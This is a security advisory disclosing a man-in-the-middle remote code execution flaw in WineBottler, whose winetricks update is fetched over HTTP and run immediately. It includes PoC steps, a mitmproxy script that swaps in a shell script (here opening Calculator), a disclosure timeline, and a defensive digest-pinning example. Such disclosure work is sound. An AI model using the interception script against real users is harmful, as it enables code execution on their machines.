WineBottler 1.8-rc4 Man-In-The-Middle / Code Execution Vulnerability
Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles

Metadata
===================================================
Release Date: 17-10-2016
Author: Florian Bogner // Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected product: WineBottler (http://winebottler.kronenberg.org/)
Affected versions: up to the still current version 1.8-rc4
Tested on: OS X El Capitan 10.11.6
CVE: product not covered
URL: https://bogner.sh/2016/10/man-in-the-middle-remote-code-execution-vulnerability-in-winebottler-and-its-bundles/
Video: https://youtu.be/nwcZIn2s6Vc
Vulnerability Status: No patch available - Developer became unresponsive after promising to fix the issue

Product Description
===================================================
WineBottler packages Windows-based programs like browsers, media players, games or business applications snugly into Mac app bundles.

Vulnerability Description
===================================================
Whenever WineBottler is launched it tries to update the bundled winetricks (https://github.com/Winetricks/winetricks) library. However, as this update is carried out over unencrypted HTTP, an attacker with man-in-the-middle capabilities can replace the downloaded winetricks.sh shell script. As the script is also launched immediately after downloading, this is a reliable man-in-the-middle remote code execution vulnerability.

The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surface.

PoC
===================================================
1.) Set up an HTTP proxy like Burp (https://portswigger.net/burp/)
2.) Redirect all HTTP traffic to this proxy
3.) Launch WineBottler
4.) Modify the request to http://winetricks.org/winetricks so that it returns a valid shell script.
5.) Remote code execution has been gained!

The following mitmproxy (https://mitmproxy.org/index.html) script "drunken-winebottler.py" can be used to automate the attack:

```python
from mitmproxy.models import decoded

NEWLINE = '\r\n'


def response(context, flow):
    if flow.request.url == "http://winetricks.org/winetricks" and flow.response.status_code == 301 and flow.request.method == "GET":
        flow.response.status_code = 200  # overwrite 301 status code to 200
        with decoded(flow.response):  # automatically decode gzipped responses.
            flow.response.content = ""  # replace original script to launch Calculator.app
            flow.response.content += '#!/bin/sh' + NEWLINE
            flow.response.content += '/usr/bin/open /Applications/Calculator.app'
```

Disclosure Timeline
===================================================
29.5.2016: The issue has been discovered
30.5.2016: Tried to establish initial contact with the developer using Facebook
31.5.2016: Requested CVE number; retried to contact developer using Facebook
1.6.2016: MITRE declined CVE: the product is not covered.
2.6.2016: Created this documentation; sent to developer using mail
18.6.2016: Developer responded on Facebook
20.6.2016: Developer promised that the winetricks update will be switched to HTTPS. Agreed on the 29.7. for the public disclosure
25.7.2016: Tried to contact developer as no new version has been released - no success
29.7.2016: Initially agreed public disclosure date - rescheduled
31.7.2016: Tried again to contact developer - again no success
13.8.2016: Tried a last time to get in touch with the developer - again no success
17.10.2016: Public disclosure although unfixed: developer unresponsive for several months

Suggested Solution
===================================================
All requests should be carried out over encrypted communication channels like HTTPS. The author already mentioned (https://mike.kronenberg.org/winebottler-1-7-52/) that he is planning to do so in the future. Yet, right now there is no patch available.
The only workaround would be to block outgoing (HTTP) connections. However, whenever I tried that, WineBottler stalled...
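From the defender's side, the HTTPS switch the Suggested Solution calls for is best paired with integrity checking of the downloaded script, so that "download, then run immediately" cannot execute a body altered in transit. The following is an added example, not WineBottler's or winetricks' own code: it refuses a plaintext update URL and writes the fetched script to disk only after its SHA-256 matches a digest pinned at build time. The URL, script bytes and digest are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import tempfile
from urllib.parse import urlparse


class UpdateRejected(Exception):
    """Raised when a fetched update must not be written to disk or run."""


def check_update_url(url: str) -> str:
    """Accept only HTTPS update sources; a plaintext URL is rejected outright."""
    parts = urlparse(url)
    if parts.scheme != "https" or not parts.netloc:
        raise UpdateRejected(f"refusing non-HTTPS update source: {url}")
    return url


def verify_script(content: bytes, expected_sha256: str) -> bool:
    """True only if the downloaded bytes match the digest pinned at release time."""
    actual = hashlib.sha256(content).hexdigest()
    return hmac.compare_digest(actual, expected_sha256.lower())


def stage_update(content: bytes, expected_sha256: str, dest_dir=None) -> str:
    """Write the script only after it verifies, and return its path.

    A body altered in transit fails the digest check and is never written,
    so a 'run it right after download' step has nothing to execute.
    """
    if not verify_script(content, expected_sha256):
        raise UpdateRejected("digest mismatch: update body was altered in transit")
    fd, path = tempfile.mkstemp(prefix="winetricks-", suffix=".sh", dir=dest_dir)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    os.chmod(path, 0o700)  # owner-executable, and only now that it has verified
    return path


# Constructed sample data for the demonstration (not real winetricks content).
# In a real updater the pinned digest ships inside the application, not beside
# the download, so an on-path attacker cannot substitute both at once.
GENUINE_SCRIPT = b"#!/bin/sh\necho 'winetricks stub'\n"
PINNED_SHA256 = hashlib.sha256(GENUINE_SCRIPT).hexdigest()
TAMPERED_SCRIPT = b"#!/bin/sh\necho 'replaced in transit'\n"
```

A digest alone only helps if it reaches the client over a channel the attacker cannot rewrite, which is why it belongs in the signed application bundle rather than next to the script on the same HTTP host.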